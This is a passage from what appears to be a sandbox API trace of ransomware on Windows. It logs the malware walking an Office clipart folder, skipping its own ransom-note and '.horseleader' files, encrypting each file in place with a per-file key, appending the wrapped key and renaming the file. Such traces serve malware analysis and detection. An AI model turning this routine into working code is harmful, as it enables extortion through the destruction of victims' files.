nFileSizeHigh=0x0, nFileSizeLow=0x3a94, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS01635_.WMF", cAlternateFileName="")) returned 1 [0253.763] lstrcmpiW (lpString1="BS01635_.WMF", lpString2="Windows") returned -1 [0253.763] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 67 [0253.763] StrStrIW (lpFirst="BS01635_.WMF", lpSrch=".horseleader") returned 0x0 [0253.763] lstrcmpW (lpString1="BS01635_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.763] lstrcmpW (lpString1="BS01635_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.763] lstrlenW (lpString=".testttjffg") returned 11 [0253.764] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.764] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.764] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.764] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01635_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.764] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 67 [0253.764] StrStrW (lpFirst="BS01635_.WMF", lpSrch=".txt") returned 0x0 [0253.764] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=14996) returned 1 [0253.764] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3a94, lpOverlapped=0x0) returned 1 [0253.769] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc56c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.770] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3a94, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3a94, lpOverlapped=0x0) returned 1 [0253.770] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.770] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.770] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.770] CloseHandle (hObject=0x158) returned 1 [0253.771] GetProcessHeap () returned 0x780000 [0253.771] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.771] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF.horseleader") returned 79 [0253.771] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01635_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01635_.wmf.horseleader")) returned 1 [0253.772] GetProcessHeap () returned 0x780000 [0253.772] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.772] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe440e600, ftCreationTime.dwHighDateTime=0x1bd4bee, ftLastAccessTime.dwLowDateTime=0x600aeb50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe440e600, ftLastWriteTime.dwHighDateTime=0x1bd4bee, nFileSizeHigh=0x0, nFileSizeLow=0x752, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS01636_.WMF", cAlternateFileName="")) returned 1 [0253.773] lstrcmpiW (lpString1="BS01636_.WMF", lpString2="Windows") returned -1 [0253.773] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 67 [0253.774] StrStrIW (lpFirst="BS01636_.WMF", lpSrch=".horseleader") returned 0x0 [0253.774] lstrcmpW (lpString1="BS01636_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.774] lstrcmpW (lpString1="BS01636_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.774] lstrlenW (lpString=".testttjffg") returned 11 [0253.774] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.774] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.774] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.774] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01636_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.775] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 67 [0253.775] StrStrW (lpFirst="BS01636_.WMF", lpSrch=".txt") returned 0x0 [0253.775] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1874) returned 1 [0253.775] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x752, lpOverlapped=0x0) returned 1 [0253.778] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff8ae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.778] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x752, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x752, lpOverlapped=0x0) returned 1 [0253.778] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.778] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.778] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.779] CloseHandle (hObject=0x158) returned 1 [0253.779] GetProcessHeap () returned 0x780000 [0253.779] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.779] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF.horseleader") returned 79 [0253.779] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01636_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01636_.wmf.horseleader")) returned 1 [0253.780] GetProcessHeap () returned 0x780000 [0253.780] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.780] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x910b6b00, ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x910b6b00, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0xf6c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS01637_.WMF", cAlternateFileName="")) returned 1 [0253.781] lstrcmpiW (lpString1="BS01637_.WMF", lpString2="Windows") returned -1 [0253.781] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 67 [0253.781] StrStrIW (lpFirst="BS01637_.WMF", lpSrch=".horseleader") returned 0x0 [0253.781] lstrcmpW (lpString1="BS01637_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.781] lstrcmpW (lpString1="BS01637_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.781] lstrlenW (lpString=".testttjffg") returned 11 [0253.781] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.781] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.781] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.781] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01637_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.782] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 67 [0253.782] StrStrW (lpFirst="BS01637_.WMF", lpSrch=".txt") returned 0x0 [0253.782] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3948) returned 1 [0253.783] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xf6c, lpOverlapped=0x0) returned 1 [0253.787] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff094, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.787] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xf6c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xf6c, lpOverlapped=0x0) returned 1 [0253.787] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.787] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.787] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.787] CloseHandle (hObject=0x158) returned 1 [0253.788] GetProcessHeap () returned 0x780000 [0253.788] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.788] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF.horseleader") returned 79 [0253.788] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01637_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01637_.wmf.horseleader")) returned 1 [0253.789] GetProcessHeap () returned 0x780000 [0253.789] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.789] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd16ae900, ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd16ae900, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0x292a, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS01638_.WMF", cAlternateFileName="")) returned 1 [0253.789] lstrcmpiW (lpString1="BS01638_.WMF", lpString2="Windows") returned -1 [0253.789] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 67 [0253.789] StrStrIW (lpFirst="BS01638_.WMF", lpSrch=".horseleader") returned 0x0 [0253.789] lstrcmpW (lpString1="BS01638_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.789] lstrcmpW (lpString1="BS01638_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.789] lstrlenW (lpString=".testttjffg") returned 11 [0253.789] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.789] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.789] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.789] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01638_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.790] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 67 [0253.790] StrStrW (lpFirst="BS01638_.WMF", lpSrch=".txt") returned 0x0 [0253.790] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=10538) returned 1 [0253.790] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x292a, lpOverlapped=0x0) returned 1 [0253.793] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd6d6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.793] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x292a, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x292a, lpOverlapped=0x0) returned 1 [0253.793] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.793] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.794] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.794] CloseHandle (hObject=0x158) returned 1 [0253.794] GetProcessHeap () returned 0x780000 [0253.794] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.794] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF.horseleader") returned 79 [0253.794] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01638_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01638_.wmf.horseleader")) returned 1 [0253.795] GetProcessHeap () returned 0x780000 [0253.795] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.795] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88c32800, ftCreationTime.dwHighDateTime=0x1bd4bef, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x88c32800, ftLastWriteTime.dwHighDateTime=0x1bd4bef, nFileSizeHigh=0x0, nFileSizeLow=0x108c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS01639_.WMF", cAlternateFileName="")) returned 1 [0253.795] lstrcmpiW (lpString1="BS01639_.WMF", lpString2="Windows") returned -1 [0253.795] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 67 [0253.795] StrStrIW (lpFirst="BS01639_.WMF", lpSrch=".horseleader") returned 0x0 [0253.795] lstrcmpW (lpString1="BS01639_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.796] lstrcmpW (lpString1="BS01639_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.796] lstrlenW (lpString=".testttjffg") returned 11 [0253.796] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.796] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.796] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.796] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01639_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.797] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 67 [0253.797] StrStrW (lpFirst="BS01639_.WMF", lpSrch=".txt") returned 0x0 [0253.797] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4236) returned 1 [0253.797] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x108c, lpOverlapped=0x0) returned 1 [0253.800] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffef74, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.800] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x108c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x108c, lpOverlapped=0x0) returned 1 [0253.800] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.800] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.800] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.800] CloseHandle (hObject=0x158) returned 1 [0253.800] GetProcessHeap () returned 0x780000 [0253.801] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.801] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF.horseleader") returned 79 [0253.801] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01639_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01639_.wmf.horseleader")) returned 1 [0253.802] GetProcessHeap () returned 0x780000 [0253.802] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.802] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x51c50cb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x246a, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="CARBN_01.MID", cAlternateFileName="")) returned 1 [0253.802] lstrcmpiW (lpString1="CARBN_01.MID", lpString2="Windows") returned -1 [0253.802] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 67 [0253.802] StrStrIW (lpFirst="CARBN_01.MID", lpSrch=".horseleader") returned 0x0 [0253.802] lstrcmpW (lpString1="CARBN_01.MID", lpString2="#Decrypt#.txt") returned 1 [0253.802] lstrcmpW (lpString1="CARBN_01.MID", lpString2="_uninstalling_.png") returned 1 [0253.802] lstrlenW (lpString=".testttjffg") returned 11 [0253.802] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID", lpSrch=".testttjffg") returned 0x0 [0253.803] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.803] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.803] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\carbn_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.803] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 67 [0253.803] StrStrW (lpFirst="CARBN_01.MID", lpSrch=".txt") returned 0x0 [0253.803] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=9322) returned 1 [0253.803] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x246a, lpOverlapped=0x0) returned 1 [0253.805] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffdb96, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.805] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x246a, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x246a, lpOverlapped=0x0) returned 1 [0253.806] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, 